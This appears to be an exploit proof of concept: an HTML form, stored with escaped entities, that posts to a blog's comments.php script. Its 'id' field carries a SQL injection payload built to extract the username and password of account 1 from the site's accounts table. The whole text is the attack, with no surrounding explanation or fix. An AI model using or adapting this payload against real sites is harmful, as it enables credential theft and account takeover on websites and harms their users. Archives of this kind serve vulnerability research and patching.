&lt;form action=&quot;http://www.example.com/dcfmblog/comments.php&quot; method=&quot;post&quot;&gt;
  &lt;input type=&quot;text&quot; name=&quot;id&quot; size=50 value=&quot;-99&#039; union select 0,username,password from accounts where id=1/*&quot;&gt;
  &lt;input type=&quot;submit&quot; value=&quot; send &quot;&gt;
&lt;/form&gt;